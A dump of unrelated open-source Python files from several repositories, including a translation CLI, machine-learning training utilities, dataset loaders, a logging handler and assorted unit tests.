sys.stderr.write('error: missing secret in [baidu] section\n')
sys.exit()
self.apikey = self._config['apikey']
self.secret = self._config['secret']
langmap = {
'zh-cn': 'zh',
'zh-chs': 'zh',
'zh-cht': 'cht',
'en-us': 'en',
'en-gb': 'en',
'ja': 'jp',
}
self.langmap = langmap
def convert_lang (self, lang):
t = lang.lower()
if t in self.langmap:
return self.langmap[t]
return lang
def translate (self, sl, tl, text):
sl, tl = self.guess_language(sl, tl, text)
req = {}
req['q'] = text
req['from'] = self.convert_lang(sl)
req['to'] = self.convert_lang(tl)
req['appid'] = self.apikey
req['salt'] = str(int(time.time() * 1000) + random.randint(0, 10))
req['sign'] = self.sign(text, req['salt'])
url = "https://fanyi-api.baidu.com/api/trans/vip/translate"
r = self.http_post(url, req)
resp = r.json()
res = {}
res['text'] = text
res['sl'] = sl
res['tl'] = tl
res['info'] = resp
res['translation'] = self.render(resp)
res['html'] = None
res['xterm'] = None
return res
def sign (self, text, salt):
t = self.apikey + text + salt + self.secret
return self.md5sum(t)
def render (self, resp):
output = ''
result = resp['trans_result']
for item in result:
output += '' + item['src'] + '\n'
output += ' * ' + item['dst'] + '\n'
return output
#----------------------------------------------------------------------
# Ciba (iCIBA)
#----------------------------------------------------------------------
class CibaTranslator (BasicTranslator):
def __init__ (self, **argv):
super(CibaTranslator, self).__init__('ciba', **argv)
def translate (self, sl, tl, text):
sl, tl = self.guess_language(sl, tl, text)
url = 'https://fy.iciba.com/ajax.php'
req = {}
req['a'] = 'fy'
req['f'] = sl
req['t'] = tl
req['w'] = text
r = self.http_get(url, req, None)
if not r:
return None
try:
resp = r.json()
except:
return None
resp = r.json()
if not resp:
return None
res = self.create_translation(sl, tl, text)
res['definition'] = ''
if 'content' in resp:
if 'out' in resp['content']:
res['definition'] = resp['content']['out'] or ''
if 'ph_en' in resp['content']:
res['phonetic'] = resp['content']['ph_en'] or ''
if 'word_mean' in resp['content']:
res['explain'] = resp['content']['word_mean'] or ''
return res
#----------------------------------------------------------------------
# Parse command-line arguments
#----------------------------------------------------------------------
def getopt (argv):
args = []
options = {}
if argv is None:
argv = sys.argv[1:]
index = 0
count = len(argv)
while index < count:
arg = argv[index]
if arg != '':
head = arg[:1]
if head != '-':
break
if arg == '-':
break
name = arg.lstrip('-')
key, _, val = name.partition('=')
options[key.strip()] = val.strip()
index += 1
while index < count:
args.append(argv[index])
index += 1
return options, args
#----------------------------------------------------------------------
# Engine registry
#----------------------------------------------------------------------
ENGINES = {
'google': GoogleTranslator,
'azure': AzureTranslator,
'baidu': BaiduTranslator,
'youdao': YoudaoTranslator,
'bing': BingDict,
'ciba': CibaTranslator,
}
#----------------------------------------------------------------------
# Main program
#----------------------------------------------------------------------
def main(argv = None):
if argv is None:
argv = sys.argv
argv = [ n for n in argv ]
options, args = getopt(argv[1:])
engine = options.get('engine')
if not engine:
engine = 'google'
sl = options.get('from')
if not sl:
sl = 'auto'
tl = options.get('to')
if not tl:
tl = 'auto'
if not args:
msg = 'usage: translator.py {--engine=xx} {--from=xx} {--to=xx}'
print(msg + ' {-json} text')
print('engines:', list(ENGINES.keys()))
return 0
text = ' '.join(args)
cls = ENGINES.get(engine)
if not cls:
print('bad engine name: ' + engine)
return -1
translator = cls()
res = translator.translate(sl, tl, text)
if 'json' in options:
text = json.dumps(res)
sys.stdout.write(str(text))
return 0
if not res:
return -2
if 'text' in res:
if res['text']:
print(res['text'])
if 'phonetic' in res:
if res['phonetic'] and ('phonetic' in options):
print('[' + res['phonetic'] + ']')
if 'definition' in res:
if res['definition']:
print(res['definition'])
if 'explain' in res:
if res['explain']:
print('\n'.join(res['explain']))
elif 'translation' in res:
if res['translation']:
print(res['translation'])
if 'alternative' in res:
if res['alternative']:
print('\n'.join(res['alternative']))
return 0
#----------------------------------------------------------------------
# New endpoints worth trying
#----------------------------------------------------------------------
'''
http://dict.youdao.com/fsearch?client=deskdict&keyfrom=chrome.extension&q=a%20day&pos=-1&doctype=xml&xmlVersion=3.2&dogVersion=1.0&vendor=unknown&appVer=3.1.17.4208
'''
#----------------------------------------------------------------------
# testing suite
#----------------------------------------------------------------------
if __name__ == '__main__':
def test1():
bt = BasicTranslator('test')
r = bt.request("http://www.baidu.com")
print(r.text)
return 0
def test2():
gt = GoogleTranslator()
# r = gt.translate('auto', 'auto', 'Hello, World !!')
# r = gt.translate('auto', 'auto', '你吃饭了没有?')
# r = gt.translate('auto', 'auto', '长')
r = gt.translate('auto', 'auto', 'long')
# r = gt.translate('auto', 'auto', 'kiss')
# r = gt.translate('auto', 'auto', '亲吻')
import pprint
print(r['translation'])
# pprint.pprint(r['info'])
return 0
def test3():
t = YoudaoTranslator()
r = t.translate('auto', 'auto', 'kiss')
import pprint
pprint.pprint(r)
print(r['translation'])
return 0
def test4():
t = AzureTranslator()
r = t.translate('', 'japanese', '吃饭没有?')
# print(r['info'])
# print()
print(r['translation'])
def test5():
t = BaiduTranslator()
r = t.translate('', '', '吃饭了没有?')
import pprint
pprint.pprint(r)
print(r['translation'])
return 0
def test6():
t = CibaTranslator()
r = t.translate('', '', '吃饭没有?')
# print(r['info'])
# print()
print(r['translation'])
def test7():
# t = CibaTranslator()
t = GoogleTranslator()
# t = YoudaoTranslator()
# t = BingDict()
# r = t.translate('zh', 'en', '吃饭了没有?')
# r = t.translate('', '', 'apple')
r = t.translate('', '', '正在测试翻译一段话')
pprint.pprint(r)
def test9():
argv = ['', '正在测试翻译一段话']
main(argv)
print('=====')
argv = ['', '--engine=bing', '--sl=zh', '--tl=en', '正在测试翻译一段话']
main(argv)
print('=====')
argv = ['', '--engine=bing', '--sl=zh', '--tl=en', '-json', '苹果']
main(argv)
return 0
# test9()
main()
|
Data/Algorithm/Python/bubbleSort.py | jecqiang/PHPer | 376 | 12691638 | def bubble_sort(arry):
    n = len(arry)  # get the length of the array
    for i in range(n):
        for j in range(1, n-i):
            if arry[j-1] > arry[j]:  # if the previous element is larger than the next
                arry[j-1], arry[j] = arry[j], arry[j-1]  # swap the two
return arry
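if __name__ == "__main__":
    # Hedged usage sketch (added; not in the original file): sorts a small
    # sample list in place and prints it; expected output: [1, 2, 5, 7, 9].
    print(bubble_sort([5, 2, 9, 1, 7]))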
|
dev/Gems/CloudGemFramework/v1/AWS/common-code/Utils/test/test_unit_aws_sts.py | BadDevCode/lumberyard | 1,738 | 12691644 | #
# All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or
# its licensors.
#
# For complete copyright and license terms please see the LICENSE at the root of this
# distribution (the "License"). All use of this software is governed by the License,
# or, if provided, by the license below or the license accompanying this file. Do not
# remove or modify any license notices. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
import unittest
from unittest import mock
from unittest.mock import MagicMock
from cgf_utils.aws_sts import AWSSTSUtils
class UnitTest_AWSSTSUtils(unittest.TestCase):
TEST_REGION = "test-region"
TOKEN_FROM_REGIONAL = "<PASSWORD>" # random string
TOKEN_FROM_GLOBAL = "F" + TOKEN_FROM_REGIONAL
MOCK_SESSION = MagicMock()
MOCK_SESSION.client.return_value = MagicMock()
def test_endpoint_construction(self):
aws_sts = AWSSTSUtils(self.TEST_REGION)
self.assertTrue(self.TEST_REGION in aws_sts.endpoint_url)
def test_client_construction_with_session(self):
aws_sts = AWSSTSUtils(self.TEST_REGION)
client = aws_sts.client(self.MOCK_SESSION)
self.assertIsNotNone(client)
self.MOCK_SESSION.client.assert_called_once_with('sts', endpoint_url=aws_sts.endpoint_url)
@mock.patch("boto3.client")
def test_client_construction(self, mock_boto_sts_client):
aws_sts = AWSSTSUtils(self.TEST_REGION)
client = aws_sts.client()
self.assertIsNotNone(client)
mock_boto_sts_client.assert_called_once_with('sts', endpoint_url=aws_sts.endpoint_url, region_name=self.TEST_REGION)
@mock.patch("boto3.Session")
def test_client_construction_with_credentials(self, mock_get_session):
mock_session = mock.Mock()
mock_session.client.return_value = MagicMock()
mock_get_session.return_value = mock_session
aws_sts = AWSSTSUtils(self.TEST_REGION)
client = aws_sts.client_with_credentials(aws_access_key_id="ACCESS_KEY_ID",
aws_secret_access_key="SECRET_ACCESS_KEY",
aws_session_token="<PASSWORD>")
self.assertIsNotNone(client)
mock_get_session.assert_called_once_with(aws_access_key_id="ACCESS_KEY_ID",
aws_secret_access_key="SECRET_ACCESS_KEY",
aws_session_token="<PASSWORD>",
region_name=self.TEST_REGION)
mock_session.client.assert_called_once_with('sts', endpoint_url=aws_sts.endpoint_url)
def test_session_token_validation(self):
# No exception when calling
AWSSTSUtils.validate_session_token(self.TOKEN_FROM_REGIONAL)
# Expect exception when calling
with self.assertRaises(RuntimeError):
AWSSTSUtils.validate_session_token(self.TOKEN_FROM_GLOBAL)
|
src/utils/utils.py | TheodoreGalanos/DALLE-mtf | 385 | 12691648 | <reponame>TheodoreGalanos/DALLE-mtf
import json
from collections import defaultdict
from urllib.parse import urlparse
from shutil import rmtree
import os
import tensorflow.compat.v1 as tf
import tensorflow.compat.v2 as tf2
import mesh_tensorflow as mtf
import logging
import sys
from mesh_tensorflow.ops import Operation, Tensor
def fetch_model_params(model):
model_path = model if model.endswith(".json") else f"./configs/{model}.json"
with open(model_path) as f:
params = json.load(f)
return defaultdict(lambda: None, params)
def yes_or_no(question):
while True:
reply = str(input(question + ' (y/n): ')).lower().strip()
if reply[:1] == 'y':
return True
if reply[:1] == 'n':
return False
def mode_to_str(mode):
if mode == tf.estimator.ModeKeys.PREDICT:
return "predict"
elif mode == tf.estimator.ModeKeys.EVAL:
return "eval"
elif mode == tf.estimator.ModeKeys.TRAIN:
return "train"
else:
raise ValueError(f"Invalid mode {mode}")
def remove_gs_or_filepath(path):
parsed_url = urlparse(path)
if parsed_url.scheme == "gs":
os.system(f"gsutil rm -rf {path}")
return
rmtree(path)
def maybe_remove_gs_or_filepath(path):
if yes_or_no(f"Are you sure you want to remove '{path}' to start afresh?"):
remove_gs_or_filepath(path)
else:
exit()
def get_n_trainable_vars(graph):
"""
Gets number of trainable vars in a MTF model.
:param graph: Mesh-Tensorflow graph
:return: None
"""
total_parameters = 0
for variable in graph.trainable_variables:
shape = variable.shape.dims
variable_parameters = 1
for dim in shape:
variable_parameters *= dim.size
total_parameters += variable_parameters
print(f"\n\nN PARAMS:\n{total_parameters:,}\n\n")
def print_dim_names(graph):
"""
Print names of all Dimensions
:param graph: Mesh-Tensorflow graph
:return: None
"""
all_dim_names = []
for variable in graph.all_variables:
names = variable.shape.dimension_names
all_dim_names.append(names)
# Print all dim names in graph & write to file
all_dim_names = [item for sublist in all_dim_names for item in sublist] # Flatten all dims
unique_dims = list(set(all_dim_names))
print("ALL DIM NAMES:")
for dim_name in unique_dims:
print(dim_name)
print('\n')
def get_graph_info(graph):
"""
Wrapper fn that calculates number of trainable vars in an MTF graph & prints all dim_names to file
:param graph: Mesh-Tensorflow graph
:return: None
"""
get_n_trainable_vars(graph)
print_dim_names(graph)
def create_host_call(model_dir):
"""Construct a host_call writing scalar summaries.
Borrowed from t2t.
Args:
model_dir: String containing path to train
Returns:
(fn, args) Pair to be called by TPUEstimator as the host_call.
"""
graph = tf.get_default_graph()
# A list of (name, lowered tensor) tuples
summaries = graph.get_collection(mtf.utils.SCALAR_SUMMARIES_COLLECTION_KEY)
def maybe_cast(tensor):
# assert tensor.shape.is_compatible_with([]), tensor.name
if tensor.dtype == tf.int64:
return tf.to_int32(tensor)
if tensor.dtype == tf.bfloat16:
return tf.cast(tensor, tf.float32)
return tensor
reshaped_tensors = []
for _, t in summaries:
try:
t = tf.reshape(maybe_cast(t), [1])
except:
pass
reshaped_tensors.append(t)
# When no supported summaries are found, don't create host_call. Otherwise,
# TPU outfeed queue would enqueue global_step while host_call doesn't dequeue
# it, eventually causing hang.
if not reshaped_tensors:
return None
def host_call_fn(global_step, *args):
"""Training host call. Creates scalar summaries for training metrics."""
# This function is executed on the CPU and should not directly reference
# any Tensors in the rest of the `model_fn`. To pass Tensors from the
# model to the `model_fn`, provide as part of the `host_call`.
global_step = tf.cast(global_step[0], tf.int64)
with tf2.summary.create_file_writer(model_dir).as_default():
# We cannot directly use any tensor from summaries, because each
# tensor here must be a concat of multiple tensors from all shards.
# Therefore, we rely on the assumption that args wil have the same
# length as summaries, and all tensors in args will have the same
# order of self._tup_summaries.
assert len(args) == len(summaries)
for i, tensor in enumerate(args):
name = summaries[i][0]
if not "image" in name:
tf2.summary.scalar(name, tf.reduce_mean(tensor), step=global_step)
else:
tf2.summary.image(name, tensor, step=global_step)
return tf.summary.all_v2_summary_ops()
global_step_t = tf.reshape(tf.to_int32(tf.train.get_global_step()), [1])
return host_call_fn, [global_step_t] + reshaped_tensors
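# Hedged usage sketch (added; not part of the original module). Inside a TPU
# model_fn the (fn, args) pair returned above is normally handed straight to
# the estimator spec; the names and spec class below are illustrative
# assumptions, not taken from this repository:
#
#   host_call = create_host_call(params["model_path"])
#   return tf.estimator.tpu.TPUEstimatorSpec(
#       mode, loss=tf_loss, train_op=train_op, host_call=host_call)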
def simd_mesh_setup(params, mesh_shape, layout_rules):
"""Constructs SimdMesh function - instructions on how to evenly split tensors across all TPU cores"""
num_hosts = params["context"].num_hosts
host_placement_fn = params["context"].tpu_host_placement_function
device_list = [host_placement_fn(host_id=i) for i in range(num_hosts)]
tf.logging.info(f"device_list = {device_list}")
# TODO: Better estimation of replica cache size?
replica_cache_size = 300 * 1000000 # 300M per replica
# Worker 0 caches all the TPU binaries
worker0_mem = replica_cache_size * params["context"].num_replicas
devices_memory_usage = [worker0_mem] + [0] * (num_hosts - 1)
var_placer = mtf.utils.BalancedVariablePlacer(device_list, devices_memory_usage)
mesh_devices = [""] * mesh_shape.size
mesh_impl = mtf.simd_mesh_impl.SimdMeshImpl(
mesh_shape, layout_rules, mesh_devices, params["context"].device_assignment)
return var_placer, mesh_impl
def setup_logging(args, logdir="logs"):
os.makedirs(logdir, exist_ok=True)
tf.logging.set_verbosity(logging.INFO)
tf.get_logger().propagate = False # Remove double log on console
name = os.path.splitext(os.path.basename(args.model))[0]
handlers = [
logging.FileHandler(f"logs/{name}.log"),
logging.StreamHandler(sys.stdout)
]
logger = logging.getLogger("tensorflow")
logger.handlers = handlers
return logger
class ScalarSummaryOperation(Operation):
"""Similar to tf.Print."""
def __init__(self, name, x):
super(ScalarSummaryOperation, self).__init__(
[x], x.mesh, name=name)
self._outputs = [Tensor(self, x.shape, x.dtype)]
def lower(self, lowering):
lowered_input = lowering.tensors[self.inputs[0]].to_laid_out_tensor()
tf.add_to_collection(mtf.utils.SCALAR_SUMMARIES_COLLECTION_KEY,
(self.name, lowered_input.tensor_list[0]))
lowering.set_tensor_lowering(
self.outputs[0], lowered_input)
def gradient(self, grad_ys):
return grad_ys
def scalar_summary(name, x):
"""Call tf.summary.scalar.
Caveat - summaries do not generally work on TPU - they need to be rewritten
into a host call.
TODO(noam): provide a pointer to code for this.
Args:
name: a string
x: a 0-dimensional Tensor
Returns:
a Tensor which is identical in value to x
"""
return ScalarSummaryOperation(name, x) |
packages/pyright-internal/src/tests/samples/genericTypes4.py | sasano8/pyright | 4,391 | 12691682 | <reponame>sasano8/pyright
# This sample tests type inference and TypeVar matching.
from typing import Union
m = int(1)
n = float(1.1)
p = "hello"
a = dict(x=m, y=m)
a1: int = a["x"]
b = dict(x=n, y=n)
# This should generate an error because b should be
# typed as dict[Any, float], and b["x"] is a float.
b1: int = b["x"]
b2: float = b["x"]
c = dict(x=m, y=n)
# This should generate an error because c should be
# typed as dict[Any, float].
c1: int = c["x"]
c2: float = c["x"]
d = dict(x=p, y=p)
# This should generate an error because d should be
# typed as dict[Any, str].
d1: float = d["x"]
d2: str = d["x"]
e = dict(x=n, y=p)
# This should generate an error because e should be
# typed as dict[Any, float | str].
e1: str = e["x"]
# This should generate an error because e should be
# typed as dict[Any, float | str].
e2: float = e["x"]
e3: Union[float, str] = e["x"]
|
third_party/gsutil/third_party/rsa/tests/test_common.py | tingshao/catapult | 5,079 | 12691690 | <gh_stars>1000+
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2011 <NAME> <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import struct
from rsa._compat import byte, b
from rsa.common import byte_size, bit_size, _bit_size
class TestByte(unittest.TestCase):
def test_values(self):
self.assertEqual(byte(0), b('\x00'))
self.assertEqual(byte(255), b('\xff'))
def test_struct_error_when_out_of_bounds(self):
self.assertRaises(struct.error, byte, 256)
self.assertRaises(struct.error, byte, -1)
class TestByteSize(unittest.TestCase):
def test_values(self):
self.assertEqual(byte_size(1 << 1023), 128)
self.assertEqual(byte_size((1 << 1024) - 1), 128)
self.assertEqual(byte_size(1 << 1024), 129)
self.assertEqual(byte_size(255), 1)
self.assertEqual(byte_size(256), 2)
self.assertEqual(byte_size(0xffff), 2)
self.assertEqual(byte_size(0xffffff), 3)
self.assertEqual(byte_size(0xffffffff), 4)
self.assertEqual(byte_size(0xffffffffff), 5)
self.assertEqual(byte_size(0xffffffffffff), 6)
self.assertEqual(byte_size(0xffffffffffffff), 7)
self.assertEqual(byte_size(0xffffffffffffffff), 8)
def test_zero(self):
self.assertEqual(byte_size(0), 1)
def test_bad_type(self):
self.assertRaises(TypeError, byte_size, [])
self.assertRaises(TypeError, byte_size, ())
self.assertRaises(TypeError, byte_size, dict())
self.assertRaises(TypeError, byte_size, "")
self.assertRaises(TypeError, byte_size, None)
class TestBitSize(unittest.TestCase):
def test_zero(self):
self.assertEqual(bit_size(0), 0)
def test_values(self):
self.assertEqual(bit_size(1023), 10)
self.assertEqual(bit_size(1024), 11)
self.assertEqual(bit_size(1025), 11)
self.assertEqual(bit_size(1 << 1024), 1025)
self.assertEqual(bit_size((1 << 1024) + 1), 1025)
self.assertEqual(bit_size((1 << 1024) - 1), 1024)
self.assertEqual(_bit_size(1023), 10)
self.assertEqual(_bit_size(1024), 11)
self.assertEqual(_bit_size(1025), 11)
self.assertEqual(_bit_size(1 << 1024), 1025)
self.assertEqual(_bit_size((1 << 1024) + 1), 1025)
self.assertEqual(_bit_size((1 << 1024) - 1), 1024)
|
models/flow_model.py | fyviezhao/dressing-in-order | 172 | 12691726 | from .dior_model import *
from utils.util import StoreList, StoreDictKeyPair
from models.networks.block_extractor.block_extractor import BlockExtractor
class FlowModel(DIORModel):
def __init__(self, opt):
opt.frozen_flownet = False
DIORModel.__init__(self, opt)
self.netE_opt = opt.netE
self.visual_names = ['from_img', 'to_img', 'fake_B']
def _init_models(self, opt):
self.model_names += ["Flow"]
self.netFlow = networks.define_tool_networks(tool='flownet', load_ckpt_path=opt.flownet_path, gpu_ids=opt.gpu_ids)
self.extractor = BlockExtractor(kernel_size=1)
def forward(self):
"""Run forward pass; called by both functions <optimize_parameters> and <test>."""
self.flow_fields, _ = self.netFlow(self.from_img, self.from_kpt, self.to_kpt)
_, _, H, W = self.flow_fields[-1].size()
from_img = F.interpolate(self.from_img, (H,W))
self.fake_B = self.extractor(from_img, self.flow_fields[-1])
_, _, H, W = self.to_img.size()
self.fake_B = F.interpolate(self.fake_B, (H,W))
def backward_G(self):
self.loss_G = 0
flow_feilds = self.flow_fields
self.loss_flow_cor = 0.0
if self.loss_coe['flow_cor'] > 0:
self.loss_flow_cor = self.Correctness(self.to_img, self.from_img, flow_feilds, [2,3]) * self.loss_coe['flow_cor']
self.loss_G = self.loss_G + self.loss_flow_cor
self.loss_flow_reg = 0.0
if self.loss_coe['flow_reg'] > 0:
# import pdb; pdb.set_trace()
self.loss_flow_reg = self.Regularization(flow_feilds) * self.loss_coe['flow_reg']
self.loss_G = self.loss_G + self.loss_flow_reg
def optimize_parameters(self):
self.forward() # compute fake images: G(A)
# update G
self.optimizer_G.zero_grad() # set G's gradients to zero
        self.backward_G()                   # calculate gradients for G
        self.loss_G.backward()
        self.optimizer_G.step()             # update G's weights
self.log_loss_update()
|
crits/domains/tests.py | dutrow/crits | 738 | 12691748 | from django.test import SimpleTestCase
from django.test.client import RequestFactory
import crits.domains.views as views
import crits.domains.handlers as handlers
from crits.core.user import CRITsUser
from crits.core.handlers import add_new_source
from crits.core.source_access import SourceAccess
TSRC = "TestSource"
TUSER_NAME = "test_user"
TUSER_PASS = "<PASSWORD>"
TUSER_EMAIL = "<EMAIL>"
TUSER_ROLE = "Administrator"
DOM_REF = ""
DOM_SRC = TSRC
DOM_METH = ""
DOMAIN = "example.com"
def prep_db():
"""
Prep database for test.
"""
clean_db()
# Add Source
add_new_source(TSRC, "RandomUser")
# Add User
user = CRITsUser.create_user(
username=TUSER_NAME,
        password=TUSER_PASS,
email=TUSER_EMAIL,
)
user.save()
def clean_db():
"""
Clean database for test.
"""
src = SourceAccess.objects(name=TSRC).first()
if src:
src.delete()
user = CRITsUser.objects(username=TUSER_NAME).first()
if user:
user.delete()
class DomainHandlerTests(SimpleTestCase):
"""
Test Domain Handlers
"""
def setUp(self):
prep_db()
self.factory = RequestFactory()
self.user = CRITsUser.objects(username=TUSER_NAME).first()
self.user.save()
def tearDown(self):
clean_db()
def testDomainAdd(self):
data = {
'domain_reference': DOM_REF,
'domain_source': DOM_SRC,
'domain_method': DOM_METH,
'domain': DOMAIN,
}
errors = []
(result, errors, retVal) = handlers.add_new_domain(data, self, errors)
class DomainViewTests(SimpleTestCase):
"""
Test Domain Views
"""
def setUp(self):
prep_db()
self.factory = RequestFactory()
self.user = CRITsUser.objects(username=TUSER_NAME).first()
self.user.save()
# Add a test domain
data = {
'domain_reference': DOM_REF,
'domain_source': DOM_SRC,
'domain_method': DOM_METH,
'domain': DOMAIN,
}
errors = []
(result, errors, retVal) = handlers.add_new_domain(data, self, errors)
def tearDown(self):
clean_db()
def testUserInactiveRedirect(self):
self.req = self.factory.get('/domains/list/')
self.req.user = self.user
self.req.user.mark_inactive()
response = views.domains_listing(self.req)
self.assertEqual(response.status_code, 302)
self.assertTrue("/login/?next=/domains/list/" in response['Location'])
self.req.user.mark_active()
response = views.domains_listing(self.req)
self.assertEqual(response.status_code, 200)
def testDomainsList(self):
self.req = self.factory.get('/domains/list/')
self.req.user = self.user
response = views.domains_listing(self.req)
self.assertEqual(response.status_code, 200)
self.assertTrue("#domain_listing" in response.content)
def testDomainsjtList(self):
self.req = self.factory.post('/domains/list/jtlist/',
{},
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.req.user = self.user
response = views.domains_listing(self.req, 'jtlist')
self.assertEqual(response.status_code, 200)
|
autogoal/datasets/yeast.py | lsuarez98/autogoal | 157 | 12691776 | <filename>autogoal/datasets/yeast.py<gh_stars>100-1000
import numpy as np
import os
from autogoal.datasets import datapath, download
from sklearn.feature_extraction import DictVectorizer
def load():
"""
Loads corpora from [Yeast uci dataset](https://archive.ics.uci.edu/ml/datasets/Yeast).
##### Examples
```python
>>> X, y = load()
>>> X.shape
(1484, 8)
>>> len(y)
1484
```
"""
try:
download("yeast")
except:
print(
"Error loading data. This may be caused due to bad connection. Please delete badly downloaded data and retry"
)
raise
f = open(datapath("yeast") / "yeast.data", "r")
X = []
y = []
for i in f:
clean_line = i.strip().split()
temp = {}
temp["1"] = float(clean_line[1])
temp["2"] = float(clean_line[2])
temp["3"] = float(clean_line[3])
temp["4"] = float(clean_line[4])
temp["5"] = float(clean_line[5])
temp["6"] = float(clean_line[6])
temp["7"] = float(clean_line[7])
temp["8"] = float(clean_line[8])
X.append(temp)
y.append(clean_line[9])
return _load_onehot(X, y)
def _load_onehot(X, y):
vec = DictVectorizer(sparse=False)
return vec.fit_transform(X), np.asarray(y)
|
www/src/Lib/logging/brython_handlers.py | raspberrypieman/brython | 5,926 | 12691777 | import logging
from browser.ajax import ajax
class XMLHTTPHandler(logging.Handler):
"""
A class which sends records to a Web server, using either GET or
POST semantics.
"""
def __init__(self, url, method="GET"):
"""
Initialize the instance with the host, the request URL, and the method
("GET" or "POST")
"""
logging.Handler.__init__(self)
method = method.upper()
if method not in ["GET", "POST"]:
raise ValueError("method must be GET or POST")
self.url = url
self.method = method
def mapLogRecord(self, record):
"""
Default implementation of mapping the log record into a dict
that is sent as the CGI data. Overwrite in your class.
Contributed by <NAME>.
"""
return record.__dict__
def emit(self, record):
"""
Emit a record.
Send the record to the Web server as a percent-encoded dictionary
"""
try:
req = ajax.open(self.method, self.url, sync=False)
req.send(self.mapLogRecord(record))
except:
self.handleError(record)
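if __name__ == "__main__":
    # Hedged usage sketch (added; not in the original module). "/log" is a
    # placeholder endpoint; every record emitted below is sent to it as a
    # percent-encoded dict via the browser's XMLHttpRequest (Brython only).
    demo_log = logging.getLogger("brython-demo")
    demo_log.addHandler(XMLHTTPHandler("/log", method="POST"))
    demo_log.error("something went wrong")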
|
pybamm/models/submodels/tortuosity/bruggeman_tortuosity.py | manjunathnilugal/PyBaMM | 330 | 12691790 | #
# Class for Bruggeman tortuosity
#
import pybamm
from .base_tortuosity import BaseModel
class Bruggeman(BaseModel):
"""Submodel for Bruggeman tortuosity
Parameters
----------
param : parameter class
The parameters to use for this submodel
phase : str
The material for the model ('electrolyte' or 'electrode').
options : dict, optional
A dictionary of options to be passed to the model.
**Extends:** :class:`pybamm.tortuosity.BaseModel`
"""
def __init__(self, param, phase, options=None, set_leading_order=False):
super().__init__(param, phase, options=options)
self.set_leading_order = set_leading_order
def get_coupled_variables(self, variables):
param = self.param
if self.phase == "Electrolyte":
if self.half_cell:
tor_n = None
else:
eps_n = variables["Negative electrode porosity"]
tor_n = eps_n ** param.b_e_n
eps_s = variables["Separator porosity"]
tor_s = eps_s ** param.b_e_s
eps_p = variables["Positive electrode porosity"]
tor_p = eps_p ** param.b_e_p
elif self.phase == "Electrode":
if self.half_cell:
tor_n = None
else:
eps_n = variables["Negative electrode active material volume fraction"]
tor_n = eps_n ** param.b_s_n
eps_p = variables["Positive electrode active material volume fraction"]
tor_s = pybamm.FullBroadcast(0, "separator", "current collector")
tor_p = eps_p ** param.b_s_p
variables.update(
self._get_standard_tortuosity_variables(
tor_n, tor_s, tor_p, self.set_leading_order
)
)
return variables
|
tests/test_testbase/test_retry.py | molayxu/QTAF | 452 | 12691795 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
#
# Tencent is pleased to support the open source community by making QTA available.
# Copyright (C) 2016THL A29 Limited, a Tencent company. All rights reserved.
# Licensed under the BSD 3-Clause License (the "License"); you may not use this
# file except in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
#
"""test cases for retry mechanism
"""
import time
import unittest
from testbase.retry import Retry, RetryLimitExcceeded
class TestRetry(unittest.TestCase):
"""test retry with invalid calllee
"""
def test_retry_with_timeout(self):
def dummy(toggle_time,start_ts):
if time.time() - start_ts > toggle_time:
return True
interval = 1
timeout = 5
retry = Retry(interval=interval, timeout=timeout)
self.assertRaises(ValueError, retry.call, None)
start_time = time.time()
try:
retry.call(dummy, timeout+1, start_time)
except RetryLimitExcceeded:
time_cost = time.time() - start_time
self.assertGreaterEqual(time_cost, 5, "actual timeout=%s is less than specified timeout=%s" % (time_cost, timeout))
else:
self.fail("no RetryLimitExcceeded raised")
start_time = time.time()
count = 0
retry = Retry(interval=interval, timeout=timeout)
for retry_item in retry:
count += 1
self.assertEqual(count, retry_item.iteration, "iteration does not match")
if dummy(2, start_time):
time_cost = time.time() - start_time
self.assertGreaterEqual(time_cost, 2, "actual interval=%s is less than specified interval=%s" % (time_cost/float(count), interval))
break
else:
self.fail("unexpected timeout")
def test_retry_with_count(self):
def dummy(param):
param[0] += 1
if param[0] > 2:
return True
retry = Retry(limit=1)
self.assertRaises(ValueError, retry.call, None)
x = [0]
try:
retry.call(dummy, x)
except RetryLimitExcceeded:
pass
else:
self.fail("no RetryLimitExcceeded was raised")
x = [0]
retry = Retry(limit=3)
try:
retry.call(dummy, x)
except RetryLimitExcceeded:
self.fail("RetryLimitExcceeded was raised")
x = [0]
retry = Retry(limit=3, interval=None)
retry_count = 0
start_time = time.time()
for retry_item in retry:
retry_count +=1
self.assertEqual(retry_count, retry_item.iteration, "iteration does not match")
if dummy(x):
self.assertEqual(retry_count, 3, "iteration does not match")
break
time_cost = time.time() - start_time
self.assertLess(time_cost, 0.05, "interval is unexpected")
x = [-5]
limit=3
retry = Retry(limit=limit, interval=0.5, raise_error=False)
start_time = time.time()
retry.call(dummy, x)
time_cost = time.time() - start_time
self.assertGreaterEqual(time_cost + 0.1, (limit-1)*0.5, "interval has no effect.")
if __name__ == "__main__":
defaultTest="TestRetry.test_retry_with_count"
defaultTest=None
unittest.main(defaultTest=defaultTest)
|
mining/controllers/api/widget.py | nuaadot/mining | 785 | 12691802 | <gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from bottle import Bottle
from bottle.ext.mongo import MongoPlugin
from mining.utils import conf
from .base import get, post, put, delete
collection = 'widget'
widget_app = Bottle()
mongo = MongoPlugin(
uri=conf("mongodb")["uri"],
db=conf("mongodb")["db"],
json_mongo=True)
widget_app.install(mongo)
@widget_app.route('/', method='GET')
@widget_app.route('/<slug>', method='GET')
def widget_get(mongodb, slug=None):
return get(mongodb, collection, slug)
@widget_app.route('/', method='POST')
def widget_post(mongodb, slug=None):
return post(mongodb, collection)
@widget_app.route('/<slug>', method='PUT')
